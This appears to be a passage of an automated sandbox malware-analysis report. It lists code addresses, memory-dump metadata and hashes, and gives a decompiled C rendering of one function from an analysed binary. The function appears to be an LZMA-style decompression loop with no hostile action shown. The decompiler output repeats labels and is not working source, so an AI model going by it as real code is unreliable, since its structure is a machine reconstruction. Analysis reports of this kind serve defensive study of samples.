                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
                                                  0x00406fcf
                                                  0x00406fd1
                                                  0x00406fd3
                                                  0x00406fd3
                                                  0x00406fed
                                                  0x00406ff4
                                                  0x00406ff7
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00406ff9
                                                  0x00000000
                                                  0x00407286
                                                  0x00407286
                                                  0x0040728a
                                                  0x004075b1
                                                  0x00000000
                                                  0x004075b1
                                                  0x00407290
                                                  0x00407293
                                                  0x00407296
                                                  0x0040729a
                                                  0x0040729d
                                                  0x004072a3
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a5
                                                  0x004072a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407056
                                                  0x00407056
                                                  0x00407059
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407395
                                                  0x00407399
                                                  0x004073bb
                                                  0x004073be
                                                  0x004073c8
                                                  0x004073cb
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a5
                                                  0x004073a8
                                                  0x00000000
                                                  0x00000000
                                                  0x00407452
                                                  0x00407456
                                                  0x00407474
                                                  0x00407474
                                                  0x00407474
                                                  0x0040747b
                                                  0x00407482
                                                  0x00407489
                                                  0x00407489
                                                  0x00000000
                                                  0x00407489
                                                  0x00407458
                                                  0x0040745b
                                                  0x0040745e
                                                  0x00407461
                                                  0x00407468
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00000000
                                                  0x00000000
                                                  0x00407543
                                                  0x00407546
                                                  0x00407447
                                                  0x00000000
                                                  0x00000000
                                                  0x0040717d
                                                  0x0040717f
                                                  0x00407186
                                                  0x00407187
                                                  0x00407189
                                                  0x0040718c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407194
                                                  0x00407197
                                                  0x0040719a
                                                  0x0040719c
                                                  0x0040719e
                                                  0x0040719e
                                                  0x0040719f
                                                  0x004071a2
                                                  0x004071a9
                                                  0x004071ac
                                                  0x004071ba
                                                  0x00000000
                                                  0x00000000
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040749f
                                                  0x0040749f
                                                  0x004074a3
                                                  0x004075db
                                                  0x00000000
                                                  0x004075db
                                                  0x004074a9
                                                  0x004074ac
                                                  0x004074af
                                                  0x004074b3
                                                  0x004074b6
                                                  0x004074bc
                                                  0x004074be
                                                  0x004074be
                                                  0x004074be
                                                  0x004074c1
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c4
                                                  0x004074c7
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00000000
                                                  0x0040744d
                                                  0x00407447
                                                  0x004074cd
                                                  0x004074d3
                                                  0x004074d6
                                                  0x004074d9
                                                  0x004074dc
                                                  0x004074df
                                                  0x004074e2
                                                  0x004074e5
                                                  0x004074e8
                                                  0x004074eb
                                                  0x004074ee
                                                  0x00407507
                                                  0x0040750a
                                                  0x0040750d
                                                  0x00407510
                                                  0x00407514
                                                  0x00407516
                                                  0x00407516
                                                  0x00407517
                                                  0x0040751a
                                                  0x004074f0
                                                  0x004074f0
                                                  0x004074f8
                                                  0x004074fd
                                                  0x004074ff
                                                  0x00407502
                                                  0x00407502
                                                  0x0040751d
                                                  0x00407524
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x00407526
                                                  0x00000000
                                                  0x004071c2
                                                  0x004071c5
                                                  0x004071fb
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732b
                                                  0x0040732e
                                                  0x0040732e
                                                  0x00407331
                                                  0x00407333
                                                  0x004075bd
                                                  0x00000000
                                                  0x004075bd
                                                  0x00407339
                                                  0x0040733c
                                                  0x00000000
                                                  0x00000000
                                                  0x00407342
                                                  0x00407346
                                                  0x00407349
                                                  0x00407349
                                                  0x00407349
                                                  0x00000000
                                                  0x00407349
                                                  0x004071c7
                                                  0x004071c9
                                                  0x004071cb
                                                  0x004071cd
                                                  0x004071d0
                                                  0x004071d1
                                                  0x004071d3
                                                  0x004071d5
                                                  0x004071d8
                                                  0x004071db
                                                  0x004071f1
                                                  0x004071f6
                                                  0x0040722e
                                                  0x0040722e
                                                  0x00407232
                                                  0x0040725e
                                                  0x00407260
                                                  0x00407267
                                                  0x0040726a
                                                  0x0040726d
                                                  0x0040726d
                                                  0x00407272
                                                  0x00407272
                                                  0x00407274
                                                  0x00407277
                                                  0x0040727e
                                                  0x00407281
                                                  0x004072ae
                                                  0x004072ae
                                                  0x004072b1
                                                  0x004072b4
                                                  0x00407328
                                                  0x00407328
                                                  0x00407328
                                                  0x00000000
                                                  0x00407328
                                                  0x004072b6
                                                  0x004072bc
                                                  0x004072bf
                                                  0x004072c2
                                                  0x004072c5
                                                  0x004072c8
                                                  0x004072cb
                                                  0x004072ce
                                                  0x004072d1
                                                  0x004072d4
                                                  0x004072d7
                                                  0x004072f0
                                                  0x004072f2
                                                  0x004072f5
                                                  0x004072f6
                                                  0x004072f9
                                                  0x004072fb
                                                  0x004072fe
                                                  0x00407300
                                                  0x00407302
                                                  0x00407305
                                                  0x00407307
                                                  0x0040730a
                                                  0x0040730e
                                                  0x00407310
                                                  0x00407310
                                                  0x00407311
                                                  0x00407314
                                                  0x00407317
                                                  0x004072d9
                                                  0x004072d9
                                                  0x004072e1
                                                  0x004072e6
                                                  0x004072e8
                                                  0x004072eb
                                                  0x004072eb
                                                  0x0040731a
                                                  0x00407321
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x004072ab
                                                  0x00000000
                                                  0x00407323
                                                  0x00000000
                                                  0x00407323
                                                  0x00407321
                                                  0x00407234
                                                  0x00407237
                                                  0x00407239
                                                  0x0040723c
                                                  0x0040723f
                                                  0x00407242
                                                  0x00407244
                                                  0x00407247
                                                  0x0040724a
                                                  0x0040724a
                                                  0x0040724d
                                                  0x0040724d
                                                  0x00407250
                                                  0x00407257
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x0040722b
                                                  0x00000000
                                                  0x00407259
                                                  0x00000000
                                                  0x00407259
                                                  0x00407257
                                                  0x004071dd
                                                  0x004071e0
                                                  0x004071e2
                                                  0x004071e5
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f44
                                                  0x00406f44
                                                  0x00406f48
                                                  0x0040758d
                                                  0x00000000
                                                  0x0040758d
                                                  0x00406f4e
                                                  0x00406f51
                                                  0x00406f54
                                                  0x00406f57
                                                  0x00406f5a
                                                  0x00406f5d
                                                  0x00406f60
                                                  0x00406f62
                                                  0x00406f65
                                                  0x00406f68
                                                  0x00406f6b
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00406f6d
                                                  0x00000000
                                                  0x00000000
                                                  0x004070cf
                                                  0x004070cf
                                                  0x004070d3
                                                  0x00407599
                                                  0x00000000
                                                  0x00407599
                                                  0x004070d9
                                                  0x004070dc
                                                  0x004070df
                                                  0x004070e2
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e4
                                                  0x004070e7
                                                  0x004070ea
                                                  0x004070ed
                                                  0x004070f0
                                                  0x004070f3
                                                  0x004070f6
                                                  0x004070f7
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070f9
                                                  0x004070fc
                                                  0x004070ff
                                                  0x00407102
                                                  0x00407105
                                                  0x00407105
                                                  0x00407105
                                                  0x00407108
                                                  0x0040710a
                                                  0x0040710a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040734c
                                                  0x0040734c
                                                  0x0040734c
                                                  0x00407350
                                                  0x00000000
                                                  0x00000000
                                                  0x00407356
                                                  0x00407359
                                                  0x0040735c
                                                  0x0040735f
                                                  0x00407361
                                                  0x00407361
                                                  0x00407361
                                                  0x00407364
                                                  0x00407367
                                                  0x0040736a
                                                  0x0040736d
                                                  0x00407370
                                                  0x00407373
                                                  0x00407374
                                                  0x00407376
                                                  0x00407376
                                                  0x00407376
                                                  0x00407379
                                                  0x0040737c
                                                  0x0040737f
                                                  0x00407382
                                                  0x00407385
                                                  0x00407389
                                                  0x0040738b
                                                  0x0040738e
                                                  0x00000000
                                                  0x00407390
                                                  0x0040710d
                                                  0x0040710d
                                                  0x00000000
                                                  0x0040710d
                                                  0x0040738e
                                                  0x004075c3
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x004075fa
                                                  0x004075fa
                                                  0x00000000
                                                  0x004075fa
                                                  0x00407447
                                                  0x004073ce
                                                  0x004073cb
                                                  0x00000000
                                                  0x00407002

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                  • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                  • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                  • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
